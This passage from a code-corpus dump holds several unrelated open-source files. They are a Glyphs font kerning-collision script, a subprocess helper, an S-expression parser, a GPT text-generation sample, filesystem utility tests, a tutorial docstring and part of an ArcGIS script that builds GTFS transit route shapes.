# return effectiveKerning
# else:
# return 0.0
def pathCountOnLayer( thisLayer ):
thisLayer.removeOverlap()
return len( thisLayer.paths )
def pathCount( thisGlyph, thisFontMasterID ):
thisLayer = thisGlyph.layers[thisFontMasterID].copyDecomposedLayer()
return pathCountOnLayer(thisLayer)
def pathCountForGlyphName( glyphName, thisFont, thisFontMasterID ):
thisGlyph = thisFont.glyphs[glyphName]
return pathCount( thisGlyph, thisFontMasterID )
def pathCountInKernPair( firstGlyphName, secondGlyphName, thisFont, thisFontMasterID, minDistance ):
#ligatureName = "%s_%s" % ( nameUntilFirstPeriod(firstGlyphName), nameUntilFirstPeriod(secondGlyphName) )
#newGlyph = thisFont.newGlyphWithName_changeName_( "_deleteMe", False )
ligatureLayer = thisFont.glyphs[secondGlyphName].layers[thisFontMasterID].copyDecomposedLayer()
addedLayer = thisFont.glyphs[firstGlyphName].layers[thisFontMasterID].copyDecomposedLayer()
# position of right component:
kerning = effectiveKerning( firstGlyphName, secondGlyphName, thisFont, thisFontMasterID )
rightShift = NSAffineTransform.transform()
rightShift.translateXBy_yBy_( addedLayer.width + kerning - minDistance, 0.0 )
ligatureLayer.transform_checkForSelection_( rightShift, False )
for addedPath in addedLayer.paths:
if Glyphs.versionNumber < 3:
ligatureLayer.addPath_( addedPath.copy() )
else:
ligatureLayer.addShape_( addedPath.copy() )
return pathCountOnLayer( ligatureLayer )
try:
# query frontmost fontmaster:
thisFont = Glyphs.font
thisFontMaster = thisFont.selectedFontMaster
thisFontMasterID = thisFontMaster.id
if not thisFont.selectedLayers:
Message(title="No glyph selected", message="The script could not determine the current glyph. Please select a glyph and try again.", OKButton=None)
else:
thisGlyph = thisFont.selectedLayers[0].parent
# brings macro window to front and clears its log:
Glyphs.clearLog()
Glyphs.showMacroWindow()
print("KernCrash Current Glyph Report for %s, master %s:\n" % (thisFont.familyName, thisFontMaster.name))
# get list of glyph names:
currentGlyphName = thisGlyph.name
exceptionList = exceptions.split()
completeSet = [g.name for g in thisFont.glyphs
if g.export
and g.name not in exceptionList # excluded glyphs, list at beginning of this .py
and g.subCategory != "Nonspacing" # no combining accents
]
# get pathcounts for every glyph:
pathCountDict = {}
for thisGlyphName in completeSet:
pathCountDict[thisGlyphName] = pathCountForGlyphName( thisGlyphName, thisFont, thisFontMasterID )
# all possible kern pairs:
tabStringLeftGlyphs = []
tabStringRightGlyphs = []
for otherGlyphName in completeSet:
firstCount = pathCountDict[currentGlyphName]
secondCount = pathCountDict[otherGlyphName]
# current glyph on left side:
kernCount = pathCountInKernPair( currentGlyphName, otherGlyphName, thisFont, thisFontMasterID, 0.0 )
if firstCount + secondCount > kernCount:
tabStringLeftGlyphs.append(otherGlyphName)
# += "/%s/%s/space" % ( firstGlyphName, secondGlyphName )
# current glyph on left side:
kernCount = pathCountInKernPair( otherGlyphName, currentGlyphName, thisFont, thisFontMasterID, 0.0 )
if firstCount + secondCount > kernCount:
tabStringRightGlyphs.append(otherGlyphName)
#tabStringLeft += "/%s/%s/space" % ( firstGlyphName, secondGlyphName )
# open new Edit tab:
if tabStringLeftGlyphs or tabStringRightGlyphs:
Glyphs.showNotification('KernCrash Current Glyph', 'Some kerning crashes have been found.')
# opens new Edit tab:
tabStrings = []
if tabStringLeftGlyphs:
inBetween = " /%s/" % currentGlyphName
tabStrings.append( "/%s/"%currentGlyphName + inBetween.join(tabStringLeftGlyphs) )
print("Colliding glyphs when %s is on the LEFT:\n%s\n" % ( currentGlyphName, " ".join(tabStringLeftGlyphs) ))
if tabStringRightGlyphs:
inBetween = "/%s /" % currentGlyphName
tabStrings.append( "/" + inBetween.join(tabStringRightGlyphs) + "/%s"%currentGlyphName )
print("Colliding glyphs when %s is on the RIGHT:\n%s\n" % ( currentGlyphName, " ".join(tabStringRightGlyphs) ))
thisFont.newTab( "\n\n".join(tabStrings) )
# Floating notification:
Glyphs.showNotification(
"KernCrashed %s, master ‘%s’" % (thisFont.familyName, thisFontMaster.name),
"Found %i kerning collisions with %s. Details in Macro Window" % ( len(tabStringRightGlyphs)+len(tabStringLeftGlyphs), currentGlyphName ),
)
# or report that nothing was found:
else:
# Floating notification:
Glyphs.showNotification(
"KernCrashed %s, master ‘%s’:" % (thisFont.familyName, thisFontMaster.name),
"No collisions found for %s." % currentGlyphName,
)
except Exception as e:
Message("KernCrash Error", "KernCrash Current Glyph Error: %s\nTraceback in Macro Window." % e, OKButton=None)
import traceback
print(traceback.format_exc())
print(pathCountDict)
|
flocker/common/process.py
|
stackriot/flocker
| 2,690 |
67653
|
<gh_stars>1000+
# Copyright ClusterHQ Inc. See LICENSE file for details.
"""
Subprocess utilities.
"""
from subprocess import PIPE, STDOUT, CalledProcessError, Popen
from eliot import Message, start_action
from pyrsistent import PClass, field
class _CalledProcessError(CalledProcessError):
"""
Just like ``CalledProcessError`` except output is included in the string
representation.
"""
def __str__(self):
base = super(_CalledProcessError, self).__str__()
lines = "\n".join(" |" + line for line in self.output.splitlines())
return base + " and output:\n" + lines
class _ProcessResult(PClass):
"""
The return type for ``run_process`` representing the outcome of the process
that was run.
"""
command = field(type=list, mandatory=True)
output = field(type=bytes, mandatory=True)
status = field(type=int, mandatory=True)
def run_process(command, *args, **kwargs):
"""
Run a child process, capturing its stdout and stderr.
:param list command: An argument list to use to launch the child process.
:raise CalledProcessError: If the child process has a non-zero exit status.
:return: A ``_ProcessResult`` instance describing the result of the child
process.
"""
kwargs["stdout"] = PIPE
kwargs["stderr"] = STDOUT
action = start_action(
action_type="run_process", command=command, args=args, kwargs=kwargs)
with action:
process = Popen(command, *args, **kwargs)
output = process.stdout.read()
status = process.wait()
result = _ProcessResult(command=command, output=output, status=status)
# TODO: We should be using a specific logging type for this.
Message.new(
command=result.command,
output=result.output,
status=result.status,
).write()
if result.status:
raise _CalledProcessError(
returncode=status, cmd=command, output=output,
)
return result
|
brml/myzeros.py
|
herupraptono/pybrml
| 136 |
67672
|
#!/usr/bin/env python
"""
same as myzeros() in MATLAB
MYZEROS same as zeros(x) but if x is a scalar interprets as zeros([x 1])
"""
import numpy as np
def myzeros(x):
print "x =", x
x = np.array(x)
if x.size > 1:
out=np.zeros(x)
else:
out=np.zeros((x,1))
return out
|
ppci/lang/sexpr.py
|
windelbouwman/ppci
| 161 |
67725
|
<reponame>windelbouwman/ppci<filename>ppci/lang/sexpr.py
""" Functionality to tokenize and parse S-expressions.
"""
import io
from .common import SourceLocation
from .tools.handlexer import HandLexerBase
from .tools.recursivedescent import RecursiveDescentParser
__all__ = ("parse_sexpr",)
def tokenize_sexpr(text):
"""Generator that generates tokens for (WASM-compatible) S-expressions.
Would need work to produce tokens suited for e.g. syntax highlighting,
but good enough for now, to make the parser work.
"""
filename = "?"
f = io.StringIO(text)
lexer = SExpressionLexer()
return lexer.tokenize(f, filename)
def create_chunks(f):
""" Create a sequence of chunks """
for row, line in enumerate(f, 1):
yield (row, 1, line)
class SExpressionLexer(HandLexerBase):
""" Lexical scanner for s expressions """
def tokenize(self, f, filename):
chunks = create_chunks(f)
for token in super().tokenize(filename, chunks, self.lex_sexpr):
# print(token)
# Modify some values of tokens:
if token.typ == "string":
token.val = token.val[1:-1] # Strip of '"'
elif token.typ == "word":
if token.val[0] in "-+.01234567890": # maybe a number
try:
if "." in token.val or "e" in token.val.lower():
token.val = float(token.val)
elif token.val.startswith("0x"):
token.val = int(token.val, 16)
else:
token.val = int(token.val)
except ValueError:
pass
yield token
def lex_sexpr(self):
c = self.next_char()
if c is None:
return # EOF
if c == "(":
if self.accept(";"):
self.lex_block_comment()
else:
self.emit("(")
elif c == ";":
if self.accept(";"):
self.lex_line_comment()
else:
self.lex_atom()
elif c == ")":
self.emit(")")
elif c == '"':
self.lex_string()
elif c in " \t\r\n":
self.ignore()
else:
self.lex_atom()
return self.lex_sexpr
def lex_atom(self):
while True:
c = self.next_char()
if c is None:
break
elif c in "() \t\r\n;":
self.backup_char(c)
break
self.emit("word")
def lex_line_comment(self):
""" Eat all characters until end of line """
while True:
c = self.next_char()
if c is None or c in "\n\r":
break
self.emit("comment")
return
def lex_block_comment(self):
level = 1
c2 = self.next_char(eof=False)
while level > 0:
c1 = c2
c2 = self.next_char(eof=False)
if c1 == ";" and c2 == ")":
level -= 1
elif c1 == "(" and c2 == ";":
level += 1
self.emit("comment")
def lex_string(self):
while True:
if self.accept("\\"):
self.next_char(eof=False) # Accept any excaped char
elif self.accept('"'):
self.emit("string")
break
else:
self.next_char(eof=False)
tokens2ignore = ("comment",)
def filtered(tokens):
for token in tokens:
if token.typ not in tokens2ignore:
yield token
class SExpressionParser(RecursiveDescentParser):
""" This class can be used to parse S-expressions. """
def parse(self, tokens):
self.init_lexer(tokens)
expressions = []
while not self.at_end:
expressions.append(self.parse_sexpr())
return expressions
def parse_sexpr(self) -> tuple:
values = []
self.consume("(")
while self.peek != ")":
if self.at_end:
self.error("Unexpected end of file")
elif self.peek == "(":
val = self.parse_sexpr()
else:
val = self.consume().val
values.append(val)
self.consume(")")
return tuple(values)
def parse_sexpr(text: str, multiple=False) -> tuple:
"""Parse S-expression given as string.
Returns a tuple that represents the S-expression.
"""
assert isinstance(text, str)
expressions = parse_multiple_sexpr(text)
if len(expressions) != 1:
raise ValueError("Expected a single S-expression")
return expressions[0]
def parse_multiple_sexpr(text: str) -> tuple:
assert isinstance(text, str)
# Check start ok
tokens = filtered(tokenize_sexpr(text))
parser = SExpressionParser()
return parser.parse(tokens)
|
examples/faster/faster_generation/samples/gpt_sample.py
|
JeremyZhao1998/PaddleNLP
| 7,091 |
67749
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddlenlp.transformers import GPTLMHeadModel, GPTChineseTokenizer
import paddle
model_name = 'gpt-cpm-small-cn-distill'
tokenizer = GPTChineseTokenizer.from_pretrained(model_name)
model = GPTLMHeadModel.from_pretrained(model_name)
model.eval()
inputs = '花间一壶酒,独酌无相亲。举杯邀明月,'
inputs_ids = tokenizer(inputs)["input_ids"]
inputs_ids = paddle.to_tensor(inputs_ids, dtype='int64').unsqueeze(0)
outputs, _ = model.generate(
input_ids=inputs_ids,
max_length=10,
decode_strategy='greedy_search',
use_faster=True)
result = tokenizer.convert_ids_to_string(outputs[0].numpy().tolist())
print("Model input:", inputs)
print("Result:", result)
# 对影成三人。
|
tests/utils/test_fs.py
|
andriyor/cement
| 826 |
67755
|
import os
from pytest import raises
from cement.utils import fs
def test_abspath(tmp):
path = fs.abspath('.')
assert path.startswith('/')
def test_join(tmp, rando):
full_path = os.path.abspath(os.path.join(tmp.dir, rando))
assert fs.join(tmp.dir, rando) == full_path
def test_join_exists(tmp, rando):
full_path = os.path.abspath(os.path.join(tmp.dir, rando))
res = fs.join_exists(tmp.dir, rando)
assert res[0] == full_path
assert res[1] is False
with open(full_path, 'w') as f:
f.write('data')
res = fs.join_exists(tmp.dir, rando)
assert res[1] is True
def test_ensure_dir_exists(tmp, rando):
fs.ensure_dir_exists(fs.join(tmp.dir, rando))
assert os.path.exists(fs.join(tmp.dir, rando))
with raises(AssertionError, match='(.*)exists but is not a directory(.*)'):
fs.ensure_dir_exists(tmp.file)
def test_ensure_parent_dir_exists(tmp, rando):
fs.ensure_parent_dir_exists(fs.join(tmp.dir, 'parent', rando))
assert os.path.exists(fs.join(tmp.dir, 'parent'))
def test_tmp(tmp, rando):
t1 = fs.Tmp()
assert os.path.exists(t1.dir)
assert os.path.exists(t1.file)
with fs.Tmp() as t2:
pass
assert not os.path.exists(t2.dir)
assert not os.path.exists(t2.file)
def test_backup(tmp):
bkfile = fs.backup(tmp.file)
assert "%s.bak" % os.path.basename(tmp.file) == os.path.basename(bkfile)
bkfile = fs.backup(tmp.file)
assert "%s.bak.0" % os.path.basename(tmp.file) == os.path.basename(bkfile)
bkfile = fs.backup(tmp.file)
assert "%s.bak.1" % os.path.basename(tmp.file) == os.path.basename(bkfile)
bkdir = fs.backup(tmp.dir)
assert "%s.bak" % os.path.basename(tmp.dir) == os.path.basename(bkdir)
assert fs.backup('someboguspath') is None
def test_backup_dir_trailing_slash(tmp):
# https://github.com/datafolklabs/cement/issues/610
bkdir = fs.backup("%s/" % tmp.dir)
assert "%s.bak" % os.path.basename(tmp.dir) == os.path.basename(bkdir)
|
tutorials/W2D5_GenerativeModels/solutions/W2D5_Tutorial1_Solution_f63c0e9f.py
|
justynaekert/course-content-dl
| 473 |
67760
|
"""
An Autoencoder accepts input, compresses it, and recreates it. On the other hand,
VAEs assume that the source data has some underlying distribution and attempts
to find the distribution parameters. So, VAEs are similar to GANs
(but note that GANs work differently, as we will see in the next tutorials).
""";
|
generate-GTFS-shapes/scripts/Step1_MakeShapesFC.py
|
d-wasserman/public-transit-tools
| 130 |
67769
|
###############################################################################
## Tool name: Generate GTFS Route Shapes
## Step 1: Generate Shapes on Map
## Creator: <NAME>, Esri
## Last updated: 4 September 2019
###############################################################################
''' This tool generates a feature class of route shapes for GTFS data.
The route shapes show the geographic paths taken by the transit vehicles along
the streets or tracks. Each unique sequence of stop visits in the GTFS data will
get its own shape in the output feature class. Alternatively, the user can
select existing shapes from shapes.txt to draw in the map. The user can edit the output
feature class shapes as desired. Then, the user should use this feature class
and the other associated files in the output GDB as input to Step 2 in order
to create updated .txt files for use in the GTFS dataset.'''
################################################################################
'''Copyright 2019 Esri
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.'''
################################################################################
import sqlite3, operator, os, re, csv, itertools, sys
import numpy as np
import AGOLRouteHelper
import arcpy
class CustomError(Exception):
pass
# User input variables, set in the scripts that get input from the GUI
inGTFSdir = None
outDir = None
outGDBName = None
in_route_type_Street = None
in_route_type_Straight = None
inNetworkDataset = None
impedanceAttribute = None
driveSide = None
UTurn_input = None
restrictions = None
useJunctions = None
useBearing = None
BearingTol = None
CurbApproach = None
MaxAngle = None
useNA = None
useAGOL = None
badStops = []
# Global derived variables
ProductName = None
outGDB = None
SQLDbase = None
outSequencePoints = None
outRoutesfc = None
NoRouteGenerated = None
# Other global variables
# Use WGS coordinates because that's what the GTFS spec uses
WGSCoords = "GEOGCS['GCS_WGS_1984',DATUM['D_WGS_1984', \
SPHEROID['WGS_1984',6378137.0,298.257223563]], \
PRIMEM['Greenwich',0.0],UNIT['Degree',0.0174532925199433]]; \
-400 -400 1000000000;-100000 10000;-100000 10000; \
8.98315284119522E-09;0.001;0.001;IsHighPrecision"
WGSCoords_WKID = 4326
# Explicitly set max allowed length for route_desc. Some agencies are wordy.
max_route_desc_length = 250
def RunStep1_existing_shapestxt(shapelist):
'''Create feature classes of shapes and relevant stop sequences using an existing shapes.txt file
so the user can edit existing shapes.'''
try:
# It's okay to overwrite stuff.
orig_overwrite = arcpy.env.overwriteOutput
arcpy.env.overwriteOutput = True
# Check that the user's software version can support this tool
check_Arc_version()
# Set up the outputs
global outGDBName
if not outGDBName.lower().endswith(".gdb"):
outGDBName += ".gdb"
outGDB = os.path.join(outDir, outGDBName)
outSequencePointsName = "Stops_wShapeIDs"
outSequencePoints = os.path.join(outGDB, outSequencePointsName)
outShapesFCName = "Shapes"
outShapesFC = os.path.join(outGDB, outShapesFCName)
SQLDbase = os.path.join(outGDB, "SQLDbase.sql")
# Create output geodatabase
arcpy.management.CreateFileGDB(outDir, outGDBName)
# ----- SQLize the GTFS data -----
try:
# These are the GTFS files we need to use in this tool, so we will add them to a SQL database.
files_to_sqlize = ["stops", "stop_times", "trips", "routes", "shapes"]
connect_to_sql(SQLDbase)
SQLize_GTFS(files_to_sqlize)
except:
arcpy.AddError("Error SQLizing the GTFS data.")
raise
# ----- Add shapes to feature class -----
# Find all the route_ids and associated info
get_route_info()
# Make a feature class for shapes
arcpy.management.CreateFeatureclass(outGDB, outShapesFCName, "POLYLINE", '', '', '', WGSCoords)
arcpy.management.AddField(outShapesFC, "shape_id", "TEXT")
arcpy.management.AddField(outShapesFC, "route_id", "TEXT")
arcpy.management.AddField(outShapesFC, "route_short_name", "TEXT")
arcpy.management.AddField(outShapesFC, "route_long_name", "TEXT")
arcpy.management.AddField(outShapesFC, "route_desc", "TEXT", "", "", max_route_desc_length)
arcpy.management.AddField(outShapesFC, "route_type", "SHORT")
arcpy.management.AddField(outShapesFC, "route_type_text", "TEXT")
# Populate shapes feature class with user's selected shapes from shapes.txt
with arcpy.da.InsertCursor(outShapesFC, ["SHAPE@", "shape_id", "route_id",
"route_short_name", "route_long_name", "route_desc",
"route_type", "route_type_text"]) as cur:
for shape in shapelist:
# Get the route ids that have this shape.
# There should probably be a 1-1 relationship, but not sure.
# We're just adding route info to the shapes feature class for readability
shapesroutesfetch = '''
SELECT DISTINCT route_id FROM trips WHERE shape_id='%s'
;''' % shape
c.execute(shapesroutesfetch)
weresome = False
for route in c:
weresome = True
append_existing_shape_to_fc(shape, cur, route[0])
if not weresome:
# No trips actually use this shape, so skip adding route info
arcpy.AddWarning("shape_id %s is not used by any \
trips in your trips.txt file. You can still update this shape, but this might be an indication of problems in your GTFS dataset." % shape)
append_existing_shape_to_fc(shape, cur)
# ----- Find the sequences of stops associated with these shapes -----
# Find the lat/lon coordinates of all stops
get_stop_lat_lon()
# Create a feature class for stops associated with the selected shapes - for reference and for input to Step 2
arcpy.management.CreateFeatureclass(outGDB, outSequencePointsName, "POINT", "", "", "", WGSCoords)
arcpy.management.AddField(outSequencePoints, "stop_id", "TEXT")
arcpy.management.AddField(outSequencePoints, "shape_id", "TEXT")
arcpy.management.AddField(outSequencePoints, "sequence", "LONG")
# Populate the feature class with stops in the correct sequence
badStops = []
with arcpy.da.InsertCursor(outSequencePoints, ["SHAPE@X", "SHAPE@Y", "shape_id", "sequence", "stop_id"]) as cur:
for shape_id in shapelist:
# Trips designated with this shape_id
trips_for_shape = get_trips_with_shape_id(shape_id)
# The sequence of stops visited by each of these trips. There should probably be only one unique sequence associated with each shape_id, but not sure.
stop_sequences_for_shape = []
for trip in trips_for_shape:
stop_sequences_for_shape.append(get_trip_stop_sequence(trip))
stop_sequences_for_shape = list(set(stop_sequences_for_shape))
# Add each stop in the sequence to the feature class
for sequence in stop_sequences_for_shape:
sequence_num = 1
for stop in sequence:
try:
stop_lat = stoplatlon_dict[stop][0]
stop_lon = stoplatlon_dict[stop][1]
except KeyError:
badStops.append(stop)
sequence_num += 1
continue
cur.insertRow((float(stop_lon), float(stop_lat), shape_id, sequence_num, stop))
sequence_num += 1
if badStops:
badStops = sorted(list(set(badStops)))
messageText = "Your stop_times.txt file lists times for the following stops which are not included in your stops.txt file. These stops have been ignored. "
if ProductName == "ArcGISPro":
messageText += str(badStops)
else:
messageText += unicode(badStops)
arcpy.AddWarning(messageText)
# Set output
arcpy.SetParameterAsText(4, outShapesFC)
arcpy.SetParameterAsText(5, outSequencePoints)
arcpy.AddMessage("Done!")
arcpy.AddMessage("Output generated in " + outGDB + ":")
arcpy.AddMessage("- Shapes")
arcpy.AddMessage("- Stops_wShapeIDs")
except CustomError:
arcpy.AddError("Error generating shapes feature class from existing shapes.txt file.")
pass
except:
raise
finally:
arcpy.env.overwriteOutput = orig_overwrite
# ----- Main part of script -----
def RunStep1():
'''Run Step 1 - Generate feature class of shapes for input to Step 2, which
generates the actual GTFS shapes.txt file.'''
try:
# It's okay to overwrite stuff.
orig_overwrite = arcpy.env.overwriteOutput
arcpy.env.overwriteOutput = True
# Check that the user's software version can support this tool
check_Arc_version(useAGOL, useNA)
# Check out the Network Analyst extension license
if useNA:
if arcpy.CheckExtension("Network") == "Available":
arcpy.CheckOutExtension("Network")
else:
arcpy.AddError("The Network Analyst license is unavailable.")
raise CustomError
if useAGOL:
# Get the user's ArcGIS Online token. They must already be signed in to use this tool.
# That way we don't need to collect a username and password.
# But, you can't run this script in standalone python.
AGOLRouteHelper.get_token()
if AGOLRouteHelper.token == None:
arcpy.AddError("Unable to retrieve token for ArcGIS Online. To use this tool, \
you must be signed in to ArcGIS Online with an account that has routing privileges and credits. \
Talk to your organization's ArcGIS Online administrator for assistance.")
raise CustomError
arcpy.AddMessage("Successfully retrieved ArcGIS Online token.")
# ----- Set up the run, fix some inputs -----
# Input format is a string separated by a ; ("0 - Tram, Streetcar, Light rail;3 - Bus;5 - Cable car")
global route_type_Straight_textlist, route_type_Street_textlist, route_types_Straight, route_types_Street
if in_route_type_Street:
route_type_Street_textlist = in_route_type_Street.split(";")
else:
route_type_Street_textlist = []
if in_route_type_Straight:
route_type_Straight_textlist = in_route_type_Straight.split(";")
else:
route_type_Straight_textlist = []
route_types_Street = []
route_types_Straight = []
for rtype in route_type_Street_textlist:
route_types_Street.append(int(rtype.split(" - ")[0].strip('\'')))
for rtype in route_type_Straight_textlist:
route_types_Straight.append(int(rtype.split(" - ")[0].strip('\'')))
# Set curb approach based on side of road vehicles drive on
global CurbApproach
driveSide = "Right"
if driveSide == "Right":
CurbApproach = 1 #"Right side of vehicle"
else:
CurbApproach = 2 #"Left side of vehcle"
# Uturn policy is explained here: http://resources.arcgis.com/en/help/main/10.1/index.html#//00480000000n000000
global UTurns
if UTurn_input == "Allowed anywhere":
UTurns = "ALLOW_UTURNS"
elif UTurn_input == "Allowed only at intersections and dead ends":
UTurns = "ALLOW_DEAD_ENDS_AND_INTERSECTIONS_ONLY"
elif UTurn_input == "Allowed only at dead ends":
UTurns = "ALLOW_DEAD_ENDS_ONLY"
elif UTurn_input == "Not allowed anywhere":
UTurns = "NO_UTURNS"
# Sometimes, when locating stops, they snap to the closest street, which is
# actually a side street instead of the main road where the stop is really
# located. The Route results consequently have a lot of little loops or
# spikes sticking out the side. Sometimes we can improve results by
# locating stops on network junctions instead of streets. Sometimes this
# messes up the results, however, but we allow the users to try.
# Note: As of January 2017, I have removed the useJunctions option from
# the tool because it never really worked that great, and the useBearing
# method is a dramatic improvement. I'm leaving this code here in case
# someone wants it again.
global search_criteria
if useJunctions:
search_criteria = []
NAdesc = arcpy.Describe(inNetworkDataset)
for source in NAdesc.sources:
if source.sourceType in ["JunctionFeature", "SystemJunction"]:
search_criteria.append([source.name, "SHAPE"])
else:
search_criteria.append([source.name, "NONE"])
else:
search_criteria = "#"
# Initialize a list for shapes that couldn't be generated from the route solver
global NoRouteGenerated
NoRouteGenerated = []
# Set up the outputs
global outGDB, outSequencePoints, outRoutesfc, outRoutesfcName, SQLDbase, outGDBName
if not outGDBName.lower().endswith(".gdb"):
outGDBName += ".gdb"
outGDB = os.path.join(outDir, outGDBName)
outSequencePointsName = "Stops_wShapeIDs"
outSequencePoints = os.path.join(outGDB, outSequencePointsName)
outRoutesfcName = "Shapes"
outRoutesfc = os.path.join(outGDB, outRoutesfcName)
SQLDbase = os.path.join(outGDB, "SQLDbase.sql")
# Create output geodatabase
arcpy.management.CreateFileGDB(outDir, outGDBName)
# ----- SQLize the GTFS data -----
try:
# These are the GTFS files we need to use in this tool, so we will add them to a SQL database.
files_to_sqlize = ["stops", "stop_times", "trips", "routes"]
connect_to_sql(SQLDbase)
SQLize_GTFS(files_to_sqlize)
except:
arcpy.AddError("Error SQLizing the GTFS data.")
raise
# ----- Get lat/long for all stops and add to dictionary. Calculate location fields if necessary. -----
get_stop_lat_lon()
# Grab the pointGeometry objects for each stop
if useBearing:
get_stop_geom()
# Calculate location fields for the stops and save them to a dictionary.
if useNA and not useBearing:
calculate_stop_location_fields()
# ----- Make dictionary of route info -----
get_route_info()
# ----- Match trip_ids with route_ids -----
arcpy.AddMessage("Collecting GTFS trip information...")
get_trip_route_info()
# ----- Create ordered stop sequences -----
get_unique_stop_sequences()
# ----- Figure out which routes go with which shapes and update trips table -----
global shape_route_dict
shape_route_dict = {}
for shape in shape_trip_dict:
shaperoutes = []
for trip in shape_trip_dict[shape]:
shaperoutes.append(trip_route_dict[trip])
# Update the trips table with the shape assigned to the trip
updatetripstablestmt = "UPDATE trips SET shape_id='%s' WHERE trip_id='%s'" % (shape, trip)
c.execute(updatetripstablestmt)
conn.commit()
shaperoutesset = set(shaperoutes)
for route in shaperoutesset:
shape_route_dict.setdefault(shape, []).append(route)
conn.close()
# ----- Generate street and straight routes -----
# Create a points feature class for the stops to input for Routes
# We'll save this so users can see the stop sequences with the shape_ids.
arcpy.management.CreateFeatureclass(outGDB, outSequencePointsName, "POINT", "", "", "", WGSCoords)
arcpy.management.AddField(outSequencePoints, "stop_id", "TEXT")
arcpy.management.AddField(outSequencePoints, "shape_id", "TEXT")
arcpy.management.AddField(outSequencePoints, "sequence", "LONG")
if useNA and not useBearing:
# We will pre-calculate location fields for faster loading if we're not using Bearing
arcpy.management.AddField(outSequencePoints, "CurbApproach", "SHORT")
arcpy.management.AddField(outSequencePoints, "SourceID", "LONG")
arcpy.management.AddField(outSequencePoints, "SourceOID", "LONG")
arcpy.management.AddField(outSequencePoints, "PosAlong", "DOUBLE")
arcpy.management.AddField(outSequencePoints, "SideOfEdge", "LONG")
if useBearing:
# If we're using Bearing, add the relevant fields
arcpy.management.AddField(outSequencePoints, "CurbApproach", "SHORT")
arcpy.management.AddField(outSequencePoints, "Bearing", "DOUBLE")
arcpy.management.AddField(outSequencePoints, "BearingTol", "DOUBLE")
# Flag for whether we created the output fc in from Routes or if we need
# to create it in the straight-line part
Created_Street_Output = False
# Generate shapes following the streets
if route_types_Street:
if useNA:
Generate_Shapes_Street()
Created_Street_Output = True
elif useAGOL:
Generate_Shapes_AGOL()
Created_Street_Output = True
# Generate routes as straight lines between stops
if route_types_Straight or NoRouteGenerated:
Generate_Shapes_Straight(Created_Street_Output)
global badStops
if badStops:
badStops = sorted(list(set(badStops)))
messageText = "Your stop_times.txt file lists times for the following stops which are not included in your stops.txt file. These stops have been ignored. "
if ProductName == "ArcGISPro":
messageText += str(badStops)
else:
messageText += unicode(badStops)
arcpy.AddWarning(messageText)
# ----- Add route information to output feature class -----
arcpy.AddMessage("Adding GTFS route information to output shapes feature class")
# Explicitly set max allowed length for route_desc. Some agencies are wordy.
max_route_desc_length = 250
arcpy.management.AddField(outRoutesfc, "shape_id", "TEXT")
arcpy.management.AddField(outRoutesfc, "route_id", "TEXT")
arcpy.management.AddField(outRoutesfc, "route_short_name", "TEXT")
arcpy.management.AddField(outRoutesfc, "route_long_name", "TEXT")
arcpy.management.AddField(outRoutesfc, "route_desc", "TEXT", "", "", max_route_desc_length)
arcpy.management.AddField(outRoutesfc, "route_type", "SHORT")
arcpy.management.AddField(outRoutesfc, "route_type_text", "TEXT")
with arcpy.da.UpdateCursor(outRoutesfc, ["Name", "shape_id", "route_id",
"route_short_name", "route_long_name", "route_desc",
"route_type", "route_type_text"]) as ucursor:
for row in ucursor:
shape_id = row[0]
route_id = shape_route_dict[shape_id][0]
route_short_name = RouteDict[route_id][1]
route_long_name = RouteDict[route_id][2]
route_desc = RouteDict[route_id][3]
route_type = RouteDict[route_id][4]
route_type_text = RouteDict[route_id][8]
row[0] = row[0]
row[1] = shape_id
row[2] = route_id
row[3] = route_short_name
row[4] = route_long_name
row[5] = route_desc[0:max_route_desc_length] if route_desc else route_desc #logic handles the case where it's empty
row[6] = route_type
row[7] = route_type_text
ucursor.updateRow(row)
# ----- Finish things up -----
# Add output to map.
if useNA:
arcpy.SetParameterAsText(12, outRoutesfc)
arcpy.SetParameterAsText(13, outSequencePoints)
elif useAGOL:
arcpy.SetParameterAsText(8, outRoutesfc)
arcpy.SetParameterAsText(9, outSequencePoints)
else:
arcpy.SetParameterAsText(4, outRoutesfc)
arcpy.SetParameterAsText(5, outSequencePoints)
arcpy.AddMessage("Done!")
arcpy.AddMessage("Output generated in " + outGDB + ":")
arcpy.AddMessage("- Shapes")
arcpy.AddMessage("- Stops_wShapeIDs")
except CustomError:
arcpy.AddError("Error generating shapes feature class from GTFS data.")
pass
except:
raise
finally:
arcpy.env.overwriteOutput = orig_overwrite
def SQLize_GTFS(files_to_sqlize):
''' SQLize the GTFS data'''
arcpy.AddMessage("SQLizing the GTFS data...")
arcpy.AddMessage("(This step might take a while for large datasets.)")
# Schema of standard GTFS, with a 1 or 0 to indicate if the field is required
sql_schema = {
"stops" : {
"stop_id" : ("TEXT", 1),
"stop_code" : ("TEXT", 0),
"stop_name" : ("TEXT", 1),
"stop_desc" : ("TEXT", 0),
"stop_lat" : ("REAL", 1),
"stop_lon" : ("REAL", 1),
"zone_id" : ("TEXT", 0),
"stop_url" : ("TEXT", 0),
"location_type" : ("INTEGER", 0),
"parent_station" : ("TEXT", 0),
"stop_timezone" : ("TEXT", 0),
"wheelchair_boarding": ("INTEGER", 0)
} ,
"stop_times" : {
"trip_id" : ("TEXT", 1),
"arrival_time" : ("TEXT", 1),
"departure_time" : ("TEXT", 1),
"stop_id" : ("TEXT", 1),
"stop_sequence" : ("INTEGER", 1),
"stop_headsign" : ("TEXT", 0),
"pickup_type" : ("INTEGER", 0),
"drop_off_type" : ("INTEGER", 0),
"shape_dist_traveled" : ("REAL", 0)
} ,
"trips" : {
"route_id" : ("TEXT", 1),
"service_id" : ("TEXT", 1),
"trip_id" : ("TEXT", 1),
"trip_headsign" : ("TEXT", 0),
"trip_short_name" : ("TEXT", 0),
"direction_id" : ("INTEGER", 0),
"block_id" : ("TEXT", 0),
"shape_id" : ("TEXT", 0),
